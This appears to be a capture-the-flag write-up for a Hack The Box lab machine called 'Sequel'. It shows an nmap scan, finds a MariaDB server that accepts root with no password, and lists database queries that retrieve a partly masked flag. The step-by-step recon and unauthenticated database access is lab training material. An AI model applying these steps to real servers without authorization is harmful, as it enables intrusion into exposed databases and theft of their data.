Sequel
Resolution summary
- Maria DB was set up with no authentication. Login with root and no password
Improved skills
- Nmap script to find quick vulnerability
Used tools
- nmap
- mysql cli
Information Gathering
Nmap Scan
# Nmap 7.93 scan initiated Wed Mar 15 09:44:32 2023 as: nmap -sC -oA nmap/nmap 10.129.204.145
Nmap scan report for 10.129.204.145
Host is up (0.052s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 86
| Capabilities flags: 63486
| Some Capabilities: FoundRows, ODBCClient, LongColumnFlag, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, InteractiveClient, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: {v_WwrW<fkfAPP|DyZ3/
|_ Auth Plugin Name: mysql_native_password
# Nmap done at Wed Mar 15 09:45:17 2023 -- 1 IP address (1 host up) scanned in 45.07 seconds
Enumeration
Port 3306 - MariaDB / Mysql
Maria DB was set up with no pasword and using native password plugin. More info here: https://mariadb.com/kb/en/authentication-plugin-mysql_native_password/
Exploitation
No auth
Enumeration showed native-password and no password set. Login was simple:
Traveling through the database allowed us to find the flag easily in the htb database.
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.050 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4b**********15da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.049 sec)
MariaDB [htb]>
Lateral Movement to user
not required for flag
Privilege Escalation
not required for flag
Trophy & Loot
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 5 | flag | 7b4b**********15da8 |